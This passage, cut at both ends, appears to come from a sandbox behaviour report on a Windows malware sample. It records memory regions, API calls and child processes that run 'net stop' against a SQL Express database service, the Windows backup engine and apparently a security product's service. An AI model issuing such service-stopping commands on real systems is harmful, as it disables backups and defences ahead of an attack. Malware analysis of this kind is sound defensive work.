private name = "private_0x000000007ffe0000" filename = "" Region: id = 13859 start_va = 0xff260000 end_va = 0xff292fff entry_point = 0xff260000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 13860 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13861 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13862 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 13863 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 13864 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13865 start_va = 0x110000 end_va = 0x176fff entry_point = 0x110000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13866 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 13867 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13868 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13869 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13870 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13871 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13872 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 13873 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 13874 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 13875 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 13876 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 13877 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 13878 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 13879 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 13880 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 13881 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 13882 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 13883 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 13884 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13885 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13886 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 13887 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 13888 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13889 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13960 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 959 os_tid = 0xf64 [0123.472] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10fb90 | out: lpSystemTimeAsFileTime=0x10fb90*(dwLowDateTime=0xfeb6ded0, dwHighDateTime=0x1d48689)) [0123.472] GetCurrentProcessId () returned 0x12b4 [0123.472] GetCurrentThreadId () returned 0xf64 [0123.472] GetTickCount () returned 0x287e4 [0123.472] QueryPerformanceCounter (in: lpPerformanceCount=0x10fb98 | out: lpPerformanceCount=0x10fb98*=1817039000000) returned 1 [0123.473] GetModuleHandleW (lpModuleName=0x0) returned 0xff260000 [0123.569] __set_app_type (_Type=0x1) [0123.569] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff279c9c) returned 0x0 [0123.569] __getmainargs (in: _Argc=0xff284780, _Argv=0xff284790, _Env=0xff284788, _DoWildCard=0, _StartInfo=0xff28479c | out: _Argc=0xff284780, _Argv=0xff284790, _Env=0xff284788) returned 0 [0123.569] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0123.570] GetConsoleOutputCP () returned 0x1b5 [0123.570] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff28cec0 | out: lpCPInfo=0xff28cec0) returned 1 [0123.570] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0123.572] sprintf_s (in: _DstBuf=0x10fb38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0123.572] setlocale (category=0, locale=".437") returned="English_United States.437" [0123.573] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0123.573] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0123.573] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SQLEXPRESS /y" [0123.573] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x10f8d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0123.573] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0123.574] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x10fb28 | out: Buffer=0x10fb28*=0x1d4d50) returned 0x0 [0123.574] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x10fb28 | out: Buffer=0x10fb28*=0x1dc100) returned 0x0 [0123.574] _fileno (_File=0x7fefdba2a80) returned 0 [0123.574] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0123.574] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0123.574] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0123.574] _wcsicmp (_String1="config", _String2="stop") returned -16 [0123.574] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0123.574] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0123.574] _wcsicmp (_String1="file", _String2="stop") returned -13 [0123.574] _wcsicmp (_String1="files", _String2="stop") returned -13 [0123.574] _wcsicmp (_String1="group", _String2="stop") returned -12 [0123.574] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0123.574] _wcsicmp (_String1="help", _String2="stop") returned -11 [0123.574] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0123.574] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0123.574] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0123.574] _wcsicmp (_String1="session", _String2="stop") returned -15 [0123.574] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0123.574] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0123.574] _wcsicmp (_String1="share", _String2="stop") returned -12 [0123.574] _wcsicmp (_String1="start", _String2="stop") returned -14 [0123.574] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0123.574] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0123.574] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0123.574] _wcsicmp (_String1="accounts", _String2="MSSQL$SQLEXPRESS") returned -12 [0123.574] _wcsicmp (_String1="computer", _String2="MSSQL$SQLEXPRESS") returned -10 [0123.574] _wcsicmp (_String1="config", _String2="MSSQL$SQLEXPRESS") returned -10 [0123.574] _wcsicmp (_String1="continue", _String2="MSSQL$SQLEXPRESS") returned -10 [0123.574] _wcsicmp (_String1="cont", _String2="MSSQL$SQLEXPRESS") returned -10 [0123.574] _wcsicmp (_String1="file", _String2="MSSQL$SQLEXPRESS") returned -7 [0123.574] _wcsicmp (_String1="files", _String2="MSSQL$SQLEXPRESS") returned -7 [0123.574] _wcsicmp (_String1="group", _String2="MSSQL$SQLEXPRESS") returned -6 [0123.575] _wcsicmp (_String1="groups", _String2="MSSQL$SQLEXPRESS") returned -6 [0123.575] _wcsicmp (_String1="help", _String2="MSSQL$SQLEXPRESS") returned -5 [0123.575] _wcsicmp (_String1="helpmsg", _String2="MSSQL$SQLEXPRESS") returned -5 [0123.575] _wcsicmp (_String1="localgroup", _String2="MSSQL$SQLEXPRESS") returned -1 [0123.575] _wcsicmp (_String1="pause", _String2="MSSQL$SQLEXPRESS") returned 3 [0123.575] _wcsicmp (_String1="session", _String2="MSSQL$SQLEXPRESS") returned 6 [0123.575] _wcsicmp (_String1="sessions", _String2="MSSQL$SQLEXPRESS") returned 6 [0123.575] _wcsicmp (_String1="sess", _String2="MSSQL$SQLEXPRESS") returned 6 [0123.575] _wcsicmp (_String1="share", _String2="MSSQL$SQLEXPRESS") returned 6 [0123.575] _wcsicmp (_String1="start", _String2="MSSQL$SQLEXPRESS") returned 6 [0123.575] _wcsicmp (_String1="stats", _String2="MSSQL$SQLEXPRESS") returned 6 [0123.575] _wcsicmp (_String1="statistics", _String2="MSSQL$SQLEXPRESS") returned 6 [0123.575] _wcsicmp (_String1="stop", _String2="MSSQL$SQLEXPRESS") returned 6 [0123.575] _wcsicmp (_String1="time", _String2="MSSQL$SQLEXPRESS") returned 7 [0123.575] _wcsicmp (_String1="user", _String2="MSSQL$SQLEXPRESS") returned 8 [0123.575] _wcsicmp (_String1="users", _String2="MSSQL$SQLEXPRESS") returned 8 [0123.575] _wcsicmp (_String1="msg", _String2="MSSQL$SQLEXPRESS") returned -12 [0123.575] _wcsicmp (_String1="messenger", _String2="MSSQL$SQLEXPRESS") returned -14 [0123.575] _wcsicmp (_String1="receiver", _String2="MSSQL$SQLEXPRESS") returned 5 [0123.575] _wcsicmp (_String1="rcv", _String2="MSSQL$SQLEXPRESS") returned 5 [0123.575] _wcsicmp (_String1="netpopup", _String2="MSSQL$SQLEXPRESS") returned 1 [0123.575] _wcsicmp (_String1="redirector", _String2="MSSQL$SQLEXPRESS") returned 5 [0123.575] _wcsicmp (_String1="redir", _String2="MSSQL$SQLEXPRESS") returned 5 [0123.575] _wcsicmp (_String1="rdr", _String2="MSSQL$SQLEXPRESS") returned 5 [0123.575] _wcsicmp (_String1="workstation", _String2="MSSQL$SQLEXPRESS") returned 10 [0123.575] _wcsicmp (_String1="work", _String2="MSSQL$SQLEXPRESS") returned 10 [0123.575] _wcsicmp (_String1="wksta", _String2="MSSQL$SQLEXPRESS") returned 10 [0123.575] _wcsicmp (_String1="prdr", _String2="MSSQL$SQLEXPRESS") returned 3 [0123.575] _wcsicmp (_String1="devrdr", _String2="MSSQL$SQLEXPRESS") returned -9 [0123.575] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SQLEXPRESS") returned -1 [0123.575] _wcsicmp (_String1="server", _String2="MSSQL$SQLEXPRESS") returned 6 [0123.575] _wcsicmp (_String1="svr", _String2="MSSQL$SQLEXPRESS") returned 6 [0123.575] _wcsicmp (_String1="srv", _String2="MSSQL$SQLEXPRESS") returned 6 [0123.575] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SQLEXPRESS") returned -1 [0123.575] _wcsicmp (_String1="alerter", _String2="MSSQL$SQLEXPRESS") returned -12 [0123.575] _wcsicmp (_String1="netlogon", _String2="MSSQL$SQLEXPRESS") returned 1 [0123.575] _wcsupr (in: _String="MSSQL$SQLEXPRESS" | out: _String="MSSQL$SQLEXPRESS") returned="MSSQL$SQLEXPRESS" [0123.576] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x1dce10 [0123.579] GetServiceKeyNameW (in: hSCManager=0x1dce10, lpDisplayName="MSSQL$SQLEXPRESS", lpServiceName=0xff285750, lpcchBuffer=0x10fa48 | out: lpServiceName="", lpcchBuffer=0x10fa48) returned 0 [0123.580] _wcsicmp (_String1="msg", _String2="MSSQL$SQLEXPRESS") returned -12 [0123.580] _wcsicmp (_String1="messenger", _String2="MSSQL$SQLEXPRESS") returned -14 [0123.580] _wcsicmp (_String1="receiver", _String2="MSSQL$SQLEXPRESS") returned 5 [0123.580] _wcsicmp (_String1="rcv", _String2="MSSQL$SQLEXPRESS") returned 5 [0123.580] _wcsicmp (_String1="redirector", _String2="MSSQL$SQLEXPRESS") returned 5 [0123.580] _wcsicmp (_String1="redir", _String2="MSSQL$SQLEXPRESS") returned 5 [0123.580] _wcsicmp (_String1="rdr", _String2="MSSQL$SQLEXPRESS") returned 5 [0123.581] _wcsicmp (_String1="workstation", _String2="MSSQL$SQLEXPRESS") returned 10 [0123.581] _wcsicmp (_String1="work", _String2="MSSQL$SQLEXPRESS") returned 10 [0123.581] _wcsicmp (_String1="wksta", _String2="MSSQL$SQLEXPRESS") returned 10 [0123.581] _wcsicmp (_String1="prdr", _String2="MSSQL$SQLEXPRESS") returned 3 [0123.581] _wcsicmp (_String1="devrdr", _String2="MSSQL$SQLEXPRESS") returned -9 [0123.581] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SQLEXPRESS") returned -1 [0123.581] _wcsicmp (_String1="server", _String2="MSSQL$SQLEXPRESS") returned 6 [0123.581] _wcsicmp (_String1="svr", _String2="MSSQL$SQLEXPRESS") returned 6 [0123.581] _wcsicmp (_String1="srv", _String2="MSSQL$SQLEXPRESS") returned 6 [0123.581] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SQLEXPRESS") returned -1 [0123.581] _wcsicmp (_String1="alerter", _String2="MSSQL$SQLEXPRESS") returned -12 [0123.581] _wcsicmp (_String1="netlogon", _String2="MSSQL$SQLEXPRESS") returned 1 [0123.581] NetServiceControl (in: servername=0x0, service="MSSQL$SQLEXPRESS", opcode=0x0, arg=0x0, bufptr=0x10fa50 | out: bufptr=0x10fa50) returned 0x889 [0123.581] wcscpy_s (in: _Destination=0xff2880d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0123.582] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0123.582] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff285b50, nSize=0x800, Arguments=0xff287f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0123.584] GetFileType (hFile=0xb) returned 0x2 [0123.584] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f918 | out: lpMode=0x10f918) returned 1 [0123.585] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff285b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x10f910, lpReserved=0x0 | out: lpBuffer=0xff285b50*, lpNumberOfCharsWritten=0x10f910*=0x1e) returned 1 [0123.585] GetFileType (hFile=0xb) returned 0x2 [0123.585] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f918 | out: lpMode=0x10f918) returned 1 [0123.585] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff261efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10f910, lpReserved=0x0 | out: lpBuffer=0xff261efc*, lpNumberOfCharsWritten=0x10f910*=0x2) returned 1 [0123.585] _ultow (in: _Dest=0x889, _Radix=1112448 | out: _Dest=0x889) returned="2185" [0123.585] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff285b50, nSize=0x800, Arguments=0xff287f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0123.586] GetFileType (hFile=0xb) returned 0x2 [0123.586] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f918 | out: lpMode=0x10f918) returned 1 [0123.586] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff285b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x10f910, lpReserved=0x0 | out: lpBuffer=0xff285b50*, lpNumberOfCharsWritten=0x10f910*=0x34) returned 1 [0123.586] GetFileType (hFile=0xb) returned 0x2 [0123.587] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f918 | out: lpMode=0x10f918) returned 1 [0123.587] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff261efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10f910, lpReserved=0x0 | out: lpBuffer=0xff261efc*, lpNumberOfCharsWritten=0x10f910*=0x2) returned 1 [0123.587] NetApiBufferFree (Buffer=0x1d4d50) returned 0x0 [0123.587] NetApiBufferFree (Buffer=0x1dc100) returned 0x0 [0123.587] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SQLEXPRESS /y" [0123.587] exit (_Code=2) Process: id = "401" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x1f9c6000" os_pid = "0x12b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop wbengine /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13890 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13891 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13892 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13893 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 13894 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13895 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13896 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13897 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 13898 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13899 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13900 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 13901 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 13902 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13903 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13904 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 13905 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13906 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13907 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13908 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 960 os_tid = 0xdfc Process: id = "402" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x79c3e000" os_pid = "0xd60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "389" os_parent_pid = "0x1390" cmd_line = "C:\\Windows\\system32\\net1 stop ESHASRV /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13909 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13910 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13911 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13912 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 13913 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13914 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13915 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13916 start_va = 0xff260000 end_va = 0xff292fff entry_point = 0xff260000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 13917 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13918 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13919 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 13920 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 13980 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13981 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13982 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 13983 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13984 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13985 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13986 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14065 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14066 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 14067 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 14068 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 14069 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 14070 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 14071 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: 